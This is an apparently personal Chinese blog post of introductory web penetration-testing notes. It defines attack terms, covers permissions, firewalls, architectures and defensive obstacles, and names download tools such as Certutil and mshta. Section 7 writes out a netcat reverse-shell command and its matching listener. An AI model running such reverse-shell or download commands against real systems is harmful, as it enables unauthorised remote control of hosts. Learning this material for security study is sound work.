WEB安全-基础入门

1、常见名词解释

POC

POC:全称 ‘ Proof of Concept ‘,中文 ‘ 概念验证 ‘ ,常指一段漏洞证明的代码。

EXP

EXP:全称 ‘ Exploit ‘,中文 ‘ 利用 ‘,指利用系统漏洞进行攻击的动作。

Payload

Payload:中文 ‘ 有效载荷 ‘,指成功exploit之后,真正在目标系统执行的代码或指令。

Shellcode

Shellcode:简单翻译 ‘ shell代码 ‘,是Payload的一种,由于其建立正向/反向shell而得名。

后门

这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置,用于访问、查看或者控制这台主机。 这些改动表面上是很难被察觉的,就好像是入侵者偷偷的配了一把主人房间的钥匙,或者在不起眼处修了一条暗道,可以方便自身随意进出。通常大多数木马程序都可以被入侵者用于创建后门(BackDoor)。

Webshell

Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做是一种网页后门,可以上传下载文件,查看数据库,执行任意程序命令等

木马

就是那些表面上伪装成了正常的程序,但是当这些程序运行时,就会获取系统的整个控制权限。有很多黑客就是热衷使用木马程序来控制别人的电脑,比如灰鸽子、Gh0st、PcShare等等。

反弹端口

有人发现,防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。于是,利用这一特性,反弹端口型软件的服务端(被控制端)会主动连接客户端(控制端),就给人“被控制端主动连接控制端的假象,让人麻痹大意。

跳板

指的是间接攻击的主机或被利用来作为攻击机的机器。其实多数是虚拟机、vps和肉鸡

黑白盒测试

黑盒:没有代码的情况下进行渗透测试,不知道端口、服务

白盒:有源代码的情况下进行渗透测试,知道端口、服务

暴力破解

简称“爆破”。黑客对系统中账号的每一个可能的密码进行高度密集的自动搜索,从而破坏安全并获得对计算机的访问权限。

社会工程学

一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。通俗而言是指利用人的社会学弱点实施网络攻击的一整套方法论,其攻击手法往往出乎人意料。比如钓鱼。

撞库

撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户。 很多用户在不同网站使用的是相同的帐号密码,因此黑客可以通过获取用户在A网站的账户从而尝试登录B网址,这就可以理解为撞库攻击。

ATT&CK

可以简单理解为描述攻击者战术的知识库。ATT&CK将已知攻击者行为转换为结构化列表,将这些已知的行为汇总成战术和技术,并通过几个矩阵以及结构化威胁信息表达式(STIX)、指标信息的可信自动化交换(TAXII)来表示。

更多专业名词参考

渗透测试常用术语总结 - 11阳光 - 博客园 (cnblogs.com)

2、操作系统

个人计算机:Windows10

服务器用机:Windows Server 2016、Windows Server 2012等、Ubuntu、Centos

3、Windows&Linux 常见命令

命令只需要记住一些常见的,剩下的可以用到查百度就行

Linux命令

超全的 Linux 机器的渗透测试命令备忘表_-tulpn-CSDN博客

Windows命令

Windows下常用的100个CMD指令以及常见的操作 - 岁月长河 - 博客园 (cnblogs.com)

4、权限

我们正常在桌面创建的文件是可以修改、编辑、保存的

我们给Whitebird和Administrators都设置拒绝访问修改的权限

这是因为我们的身份是whitebird

我们只取消whitebird的拒绝,不取消Administrators的拒绝

还是没有权限,所以Administrators也得取消拒绝的权限,因为Administrators是用户组的意思,管理了很多用户,而whitebird就属于这个组,虽然whitebird已经给了可以修改、访问的权限,但是用户组在它之上,而且没有这些权限,所以还是无法正常访问。

已经验证了whitebird用户属于Administrators组,所以后期如果我们遇到了这种文件没权限的情况就要进行提权操作。

5、防火墙

出站:本地的主机访问外面的数据

入站:外面的主机访问本机的数据

自带的防火墙一般对出站的检测比较宽松,对入站的检测比较严格

6、文件上传下载-解决无图形化&解决数据传输

Linux:wget curl python ruby perl java 等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32 等

具体的指令可以通过网站上写好的,直接复制就行

https://forum.ywhack.com/bountytips.php?download

7、反弹 Shell 命令-解决数据回显&解决数据通讯

我们执行完一个命令,有时候没有回显,所以就需要用到反弹shell,或者有时候我们在被控制机器上使用类似passwd xxxx命令时,可能需要用到交互,输入我们想修改的密码,但是web网站没有交互界面,所以就需要用到反弹shell

nc -e cmd 要反弹到的主机ip 端口
nc -lvvp 端口

反向连接

反向连接是控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。例如,受害主机是一台位于内网,并且没有公网ip且能访问互联网的主机,控制主机无法直接通过ip地址访问到受害主机。所以此时需要在控制主机上监听一个端口,让受害机主动连接控制主机,从而实现对控制主机的控制。

正向连接

正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有公网ip的情况下。

总结

  • 如果被控主机出网,优先考虑使用反向连接
  • 如果被控主机有公网ip又不出网,考虑使用正向连接

8、WEB应用环境架构类

理解不同WEB应用组成角色功能架构:

开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等

开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript 等

程序源码:根据开发语言分类;应用类型分类;开源 CMS 分类;开发框架分类等

中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish 等

数据库类型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB 等

服务器操作系统:Windows 系列,Linux 系列,Mac 系列等

第三方软件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh 等

9、WEB应用安全漏洞分类

SQL 注入,文件安全,RCE 执行,XSS 跨站,CSRF/SSRF/CRLF, 反序列化,逻辑越权,未授权访问,XXE/XML,弱口令安全等

这些都属于开发语言上的漏洞

10、WEB请求过程数据包

参考:HTTP协议数据包简单总结 - cherry_cui - 博客园 (cnblogs.com)

11、抓包技术应用对象

基于网络接口抓包-网络接口

基于程序进程抓包-程序进程

基于数据协议抓包-HTTP/S&TCP&UDP

基于应用对象抓包-APP&小程序&PC_UI

基于系统使用抓包-模拟器&WIN&LINUX

基于应用对象封包-WPE 动作数据包重放通讯

12、资产架构

WEB 单个源码指向安全

在服务器上一个目录下对应一个源码,这套源码中存在漏洞

WEB 多个目录源码安全

在服务器上,同一个域名下的不用路径存在不同的站点,也就对应多套源码,任意一套源码存在漏洞,就可以进行攻击

WEB 多个端口源码安全

对于同一个ip下的不同端口架设了多个站点吗,也就对应多套源码,任意一套源码存在漏洞,就可以进行攻击

服务器架设多个站点安全

在服务器上,正常架设了多个站点,对应多套源码,任意一套源码存在漏洞,就可以进行攻击

架设第三方插件接口安全

架设的站点,比如博客类站点可以添加一些方便管理的插件,这些插件有漏洞,也可以成为攻击点

服务器架设多个应用安全

服务器上安装一些应用,通过这些应用的漏洞,进行攻击

13、番外安全

基于域名解析安全

域名解析账号泄露,被人篡改DNS解析记录,实现DNS劫持

基于服务器本身安全

服务器账号泄露,可以登录上去操作服务器

基于管理个人的安全

攻击者通过社工,获取目标的账户密码等信息

14、考虑阻碍

阻碍-站库分离

正常情况下,数据库地址为localhost,也就是本地,但是也可以设置成其他服务器

阻碍-CDN 加速服务

CDN会导致我们攻击的目标为备用站点,而不是真实站点

阻碍-负载均衡服务

负载均衡类似CDN服务,为了防止服务器挂了,所以使用了多个备用服务器,因此我们的攻击可能是备用服务器

阻碍-WAF 应用防火墙

waf防护可以阻碍xss、sql注入等

阻碍-主机防护防火墙

服务器上可能存在杀毒软件等防护工具,会检测出我们上传的马


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 767778848@qq.com